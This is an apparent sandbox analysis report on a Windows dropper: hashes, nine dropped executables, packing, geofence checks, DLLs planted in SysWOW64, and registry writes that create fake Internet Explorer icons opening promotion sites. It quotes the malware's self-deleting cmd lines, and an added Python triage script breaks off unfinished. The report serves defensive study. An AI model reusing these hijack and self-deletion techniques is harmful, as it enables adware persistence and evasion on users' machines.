Analysis
max time kernel: 142s
max time network: 145s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 23-10-2024 09:08
Static task: static1
Behavioral task: behavioral1
Sample: 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe
Resource: win7-20240708-en
Behavioral task: behavioral2
Sample: 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe
Resource: win10v2004-20241007-en
General
Target: 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe
Size: 543KB
MD5: 6e1552e43e9973359bc48ad13cc23e75
SHA1: b1e6284d6ce6f002feb55e02bac70146a335496c
SHA256: 321206bd7a96f72a34cdcd2b018e4d6978287017efc60ec254715dda7befe181
SHA512: 08cc286ef8c93d48ac1c465487d37701d9fedc520026b92e98a2e3b070dec4976d232d15cf967f57e947b932bfa3312f5b6717a36e4935991afb4e0a49eaffb8
SSDEEP: 12288:pgnJX2//HNYbQ54qt4Hag1qBOVs/72IBZwjc5Vp8wJhaz/2DmFtmgNyEqTbN:OnJGHHJmHagYBOiDJwjtwJo4mFUrp
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up the country code configured in the registry (Control Panel\International\Geo\Nation); likely used as a geofence. The submitted sample and two of the components it drops each query it.
Processes: 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe, 5.exe, ie.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | 5.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | ie.exe
-
Executes dropped EXE 9 IoCs
Processes: 5.exe, ie.exe, 146.exe, q1222211.exe, si.exe, TAEKMAN.exe, zm.exe, tj.exe, Source.exe
pid | process
4264 | 5.exe
1924 | ie.exe
3128 | 146.exe
3932 | q1222211.exe
3208 | si.exe
1052 | TAEKMAN.exe
4728 | zm.exe
3628 | tj.exe
1060 | Source.exe
-
VMProtect packed file 4 IoCs
Processes:
resource | yara_rule
behavioral2/memory/1060-112-0x0000000000400000-0x0000000000432000-memory.dmp | vmprotect
C:\Windows\temp\syccom\Source.exe | vmprotect
behavioral2/memory/1060-115-0x0000000000400000-0x0000000000432000-memory.dmp | vmprotect
behavioral2/memory/1060-134-0x0000000000400000-0x0000000000432000-memory.dmp | vmprotect
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity. In this run the deletions are dropped components removing themselves: ie.exe spawns cmd /c del "C:\Users\Admin\Local Settings\Temp\ie.exe", and tj.exe spawns cmd /c ping 127.0.0.1 -n 3 && del "C:\Users\Admin\Local Settings\Temp\tj.exe" (see the process tree below).
-
Drops file in System32 directory 2 IoCs
Processes: 146.exe
description | ioc | process
File opened for modification | C:\Windows\SysWOW64\appmgmts.dll | 146.exe
File created | C:\Windows\SysWOW64\qmgr.dll | 146.exe
Both names collide with Windows service DLLs (qmgr.dll backs BITS, appmgmts.dll backs the Application Management service), so the files 146.exe writes into SysWOW64 should be compared by hash and Authenticode signature against the copies Windows ships.
-
UPX packed file 4 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\146.exe | upx
C:\Users\Admin\AppData\Local\Temp\si.exe | upx
behavioral2/memory/3208-73-0x0000000000400000-0x000000000041F000-memory.dmp | upx
behavioral2/memory/3208-132-0x0000000000400000-0x000000000041F000-memory.dmp | upx
-
Drops file in Windows directory 4 IoCs
Processes: ie.exe, zm.exe
description | ioc | process
File created | C:\Windows\regedit.ico | ie.exe
File created | C:\Windows\TAEKMAN.exe | ie.exe
File opened for modification | \??\c:\windows\cy.ico | zm.exe
File opened for modification | \??\c:\windows\taobao.ico | zm.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 15 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host. Every process in the tree, including cmd.exe and PING.EXE, opens this key, so on its own the hit is weak evidence; the Geo\Nation query above is the more deliberate check.
Processes: cmd.exe, 146.exe, zm.exe, IEXPLORE.EXE, q1222211.exe, PING.EXE, 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe, ie.exe, si.exe, 5.exe, Source.exe, cmd.exe, TAEKMAN.exe, tj.exe, cmd.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 146.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | zm.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | IEXPLORE.EXE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | q1222211.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | PING.EXE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 6e1552e43e9973359bc48ad13cc23e75_JaffaCakes118.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | ie.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | si.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 5.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Source.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | TAEKMAN.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | tj.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems. Here the "check" is ping 127.0.0.1 -n 3 against loopback, which reaches no network at all; tj.exe uses it as a delay before cmd.exe deletes tj.exe (see the process tree below).
Processes: cmd.exe, PING.EXE
pid | process
4896 | cmd.exe
2428 | PING.EXE
-
Modifies Internet Explorer settings
These are the writes Internet Explorer makes when it is started for the first time in a profile; they are recorded because tj.exe launched IEXPLORE.EXE, not because the sample touched IE settings itself. The one value worth keeping is the Recovery\AdminActive GUID at the end of the table: its node field (E26222BAF6A3) is the MAC address that the beacon URL in the process tree carries as mac=E2:62:22:BA:F6:A3.
Processes: IEXPLORE.EXE, IEXPLORE.EXE
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1036993923" | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "436439502" | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31139115" | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1036993923" | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31139115" | IEXPLORE.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Internet Explorer\GPU | IEXPLORE.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Internet Explorer\VersionManager | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1035275599" | IEXPLORE.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000013f787289f1be14e87be8dc204ff715d00000000020000000000106600000001000020000000e362b664363c32a6b95a2d4d1a3b5f0ccfce52cbf7c79b7ce302b7cd6ecc697e000000000e80000000020000200000001f18f6c059665cc7eb3ae042db1b83bd4a7b2abfebcb30ad3cce4be8adca970a20000000fff2dae07c1ca51b2556bd491397a59572011eddfd1df1dea1eb3a49899e1fb840000000a654a2d4ff72800cd94957756a8256e2ad03cb7a200af197896082df3c0780f756424d9a7eae854be30683a34c315e0ba525da4110087ad1c09c35ccb606ffab | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | IEXPLORE.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 001f573e2b25db01 | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | IEXPLORE.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000013f787289f1be14e87be8dc204ff715d0000000002000000000010660000000100002000000058b3105de73c1b63b94686580dd9d394bdde55235d2ceb36215e6d45a1cb4b5f000000000e8000000002000020000000b7ad1407b53a34eda6231f59dd23a636d972ec6ac60cb99b157fa0e8fd7b5860200000003d0d2f1860fe9ca60020dd0cb93fe6ccbd7a23306a579dbca23d8fda2f656bd84000000023ae701cfaa5bd5638bb3d32fbe1354c452444abe5d644e7e8ed38f0b6da15d43dfa3a17d09319a5995f8cec8c7b60a85a5b6279626339d630b66b49e5669e7e | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1035275599" | IEXPLORE.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e005633e2b25db01 | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Internet Explorer\Main | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31139115" | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Internet Explorer\VersionManager | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | IEXPLORE.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | IEXPLORE.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Internet Explorer\Main | IEXPLORE.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31139115" | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{692A206C-911E-11EF-B319-E26222BAF6A3} = "0" | IEXPLORE.EXE
-
Modifies registry class 64 IoCs
Processes: ie.exe, zm.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0}\ShellFolder\Attributes = "10" | ie.exe
Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ | ie.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DefaultIcon | ie.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Shell | ie.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\Shell\Open | zm.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\Shell\??(R) | zm.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0}\DefaultIcon | ie.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0}\Shell\ÊôÐÔ(&D)\Command\ = "Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl" | ie.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0}\Shell\Open(&O)\Command\ = "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE %1 h%t%t%p:%//%w%w%w.l%el%e%14%14%14.%c%o%m" | ie.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\ = "Internet Explorer" | zm.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\LocalizedString = "@C:\\WINDOWS\\system32\\zh-CN\\\\ieframe.dll.mui,-880" | zm.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0}\ShellFolder | ie.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\Shell | zm.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284} | zm.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\ShellFolder\HideAsDeletePerUser | zm.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0} | ie.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DefaultIcon\ = "C:\\Windows\\regedit.ico" | ie.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\DefaultIcon | zm.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\Shell\??(R)\ | zm.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\Shell\??(R)\Command\ = "Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl" | zm.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\ = "Internet Explorer" | zm.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\LocalizedString = "@C:\\WINDOWS\\system32\\zh-CN\\ieframe.dll.mui,-880" | zm.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID | zm.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\Shell\Open\ = "????(H)" | zm.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0}\ = "Internet Explorer" | ie.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID | ie.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0}\Shell\Open(&O)\ = "Open(&O)" | ie.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ShellFolder | ie.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\Shell\??(R)\Command | zm.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Shell\ÊôÐÔ(&D) | ie.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Shell\ÊôÐÔ(&D)\Command\ = "Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl" | ie.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\Shell\??(R) | zm.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\ShellFolder\HideFolderVerbs | zm.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D6872828} | zm.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\Shell\??(R)\Command | zm.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0}\DefaultIcon\ = "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE" | ie.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\Shell\??(R)\Command\ = "Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl" | zm.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\ShellFolder | zm.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\ShellFolder\ = "C:\\WINDOWS\\SysWow64\\ieframe.dll,-190" | zm.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\Shell\Open\Command\ = "C:\\Program Files\\Internet Explorer\\iexplore.exe http://2.gequ.la" | zm.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\ShellFolder\WantsParseDisplayName | zm.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\Shell\ = "??" | zm.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0}\Shell\Open(&O)\Command | ie.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Shell\Open(&O)\Command\ = "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE " | ie.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\Shell\Open | zm.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\ShellFolder\ | zm.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\DefaultIcon | zm.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\ShellFolder\Attributes = "10" | zm.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node | ie.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0}\Shell\ÊôÐÔ(&D) | ie.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Shell\ÊôÐÔ(&D)\Command | ie.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\Shell\Open\ = "????(H)" | zm.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\ShellFolder | zm.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\ShellFolder\ = "C:\\WINDOWS\\SysWow64\\ieframe.dll,-190" | zm.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\ShellFolder\HideFolderVerbs | zm.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0}\Shell\ÊôÐÔ(&D)\Command | ie.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0}\Shell\Open(&O) | ie.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Shell\Open(&O)\Command | ie.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Shell\Open(&O) | ie.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\Shell\ = "Open" | zm.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\Shell\Open\Command | zm.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\DefaultIcon\ = "c:\\windows\\cy.ico" | zm.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D68728281}\Shell\Open\Command | zm.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{315F3375-A7CB-43ad-A578-270D6872828}\ShellFolder | zm.exe
-
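The rows above describe three fake "Internet Explorer" namespace icons: each CLSID gets a display name, a DefaultIcon, an Open verb whose command starts IEXPLORE.EXE with a promotion URL, and a second verb that runs Inetcpl.cpl through Rundll32 so the icon's context menu looks genuine. The script below is an added example by the editor, not part of the sandbox report, that parses a subset of those rows, groups them by CLSID and extracts what a hunt needs. Two things it does are inferences rather than facts the report states: the verb label ÊôÐÔ is read as the GBK bytes of 属性 ("Properties") that the dropper wrote through the ANSI registry API onto the en-US (code page 1252) sandbox, which means the key name to hunt for differs by the victim's ANSI code page; and the percent-laced argument of the Open(&O) verb is rendered two ways (strip every %, or first treat %1 as the shell's empty argument placeholder), neither of which the sandbox confirms. The "??" labels are characters the report did not render and are left as they are.

```python
"""Triage the CLSID shell-folder entries recorded under 'Modifies registry class'."""
import re
from collections import defaultdict

# Constructed input: fourteen rows copied from the table above, one per line, as the report
# prints them (the sandbox doubles backslashes inside values).
REG_ROWS = r"""
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0}\ShellFolder\Attributes = "10" ie.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0}\Shell\ÊôÐÔ(&D)\Command\ = "Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl" ie.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0}\Shell\Open(&O)\Command\ = "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE %1 h%t%t%p:%//%w%w%w.l%el%e%14%14%14.%c%o%m" ie.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0}\ = "Internet Explorer" ie.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DF98EB15-3044-6340-85B4-F6931B3A61A0}\DefaultIcon\ = "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE" ie.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\ = "Internet Explorer" zm.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\LocalizedString = "@C:\\WINDOWS\\system32\\zh-CN\\\\ieframe.dll.mui,-880" zm.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{215F3575-A7CB-43ad-A578-270D68728284}\Shell\Open\Command zm.exe
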